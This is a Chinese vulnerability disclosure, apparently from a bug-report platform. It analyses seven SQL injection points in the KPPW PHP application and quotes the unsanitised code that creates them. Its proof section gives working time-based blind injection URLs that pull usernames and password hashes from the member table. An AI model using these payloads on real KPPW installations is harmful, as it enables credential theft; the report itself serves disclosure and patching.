### 简要描述: KPPW最新版SQL注入漏洞七(多处不同注入点) ### 详细说明: KPPW最新版SQL注入漏洞七,多处不同注入点 第一处sql注入: 文件/control/user/transaction_works.php: ``` if($action == 'delete_image'){ $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid); $arrFileInfo = db_factory::get_one($strSql); $resText = CommonClass::delFileByFileId($fileid); if($resText){ $array = explode(',', $arrServiceInfo['pic']); $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array); $_POST['file_ids'] = implode(",", $newArr); updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic'); kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die; } } ``` 注意这里: ``` $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid); ``` $fileid 没有任何引号保护就直接拼入了 SQL 语句的 in(...) 子句,导致存在 SQL 注入 第二,三处sql注入: 继续看下面的: ``` $resText = CommonClass::delFileByFileId($fileid); ``` $fileid 继续被传入了函数 delFileByFileId,跟进函数 delFileByFileId: 文件:/lib/inc/CommonClass.php ``` public static function delFileByFileId($fileId){ $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId); $arrFileInfo = db_factory::get_one($strSql); $filename = S_ROOT.$arrFileInfo['save_name']; if(file_exists($filename)){ unlink($filename); } return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId); } ``` 这里存在两处注入:$fileid 变量在进入 select 和 delete 语句时都没有经过任何处理,导致 SQL 注入 第四,五,六处sql注入: 同样的问题出现在文件/control/user/transaction_works.php: ``` if($action == 'delete_goodsfile'){ $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid); $arrFileInfo = db_factory::get_one($strSql); $resText = CommonClass::delFileByFileId($fileid); if($resText){ $array = explode(',', $arrServiceInfo['file_path']); $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array); $_POST['file_path_2'] = implode(",", $newArr); 
updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file'); kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die; } } ``` 这里的问题跟上面分析的问题一样,存在注入。 第七处sql注入: 文件/control/user/transaction_works.php: ``` if (isset($formhash)&&kekezu::submitcheck($formhash)) { $arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']); $goodsprice = floatval($goodsprice); $floatMinCash = floatval($arrGoodsConfig['min_cash']); if($floatMinCash&&($goodsprice < $floatMinCash)){ $tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元'; kekezu::show_msg($tips,null,NULL,NULL,'error'); } if (strtoupper ( CHARSET ) == 'GBK') { $goodsname = kekezu::utftogbk($goodsname ); $goodsdesc = kekezu::utftogbk($goodsdesc ); $unite_price = kekezu::utftogbk($unite_price ); } $arrData = array( 'model_id'=> $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6, 'uid'=> $gUid, 'username'=> $gUserInfo['username'], 'indus_id'=> $indus_id, 'indus_pid'=> $indus_pid, 'title'=> $goodsname, 'price' => $goodsprice, 'pic'=> $file_ids, 'content'=> $goodsdesc, 'unite_price'=> $unite_price, 'submit_method'=> $submit_method, 'file_path'=> $file_path_2, 'confirm_max' => intval($arrGoodsConfig['confirm_max_day']) ); if(!$pk['service_id']){ $arrData['profit_rate'] = $arrGoodsConfig['service_profit']; $arrData['on_time'] = time(); $arrData['service_status'] = 2; } $objServiceT = new keke_table_class ( 'witkey_service' ); $objServiceT->save ( $arrData,$pk); unset($objServiceT); if ($objId&&$intTaskId) { $strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId; $strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId; db_factory::execute($strBidSql); db_factory::execute($strWorkSql); } kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok'); } ``` 注意这里的: ``` $objServiceT->save ( $arrData,$pk); ``` 这里的变量$pk进入了save函数,跟进save函数 
文件/lib/inc/keke_table_class.php: ``` function save($fields, $pk = array()) { foreach ( $fields as $k => $v ) { $kk = ucfirst ( $k ); $set_query = "set" . $kk; $this->_table_obj->$set_query ( $v ); } $keys = array_keys ( $pk ); $key = $keys [0]; //echo $key."\n"; //print_r($pk); //echo $pk[$key]; if (! empty ( $pk [$key] )) { $this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" ); $edit_query = "edit_" . $this->_pre . $this->_table_name; $res = $this->_table_obj->$edit_query (); } else { $create_query = "create_" . $this->_pre . $this->_table_name; $res = $this->_table_obj->$create_query (); } if ($res) { return $res; } else { return false; } } ``` 最后$pk的key进入了setWhere条件语句中,导致sql注入 ### 漏洞证明: 第一处SQL注入: ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23 ``` 这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息 第二,三处SQL注入: ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2) ``` 这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息 [<img src="https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png) 第七处SQL注入: ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2= ``` 这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息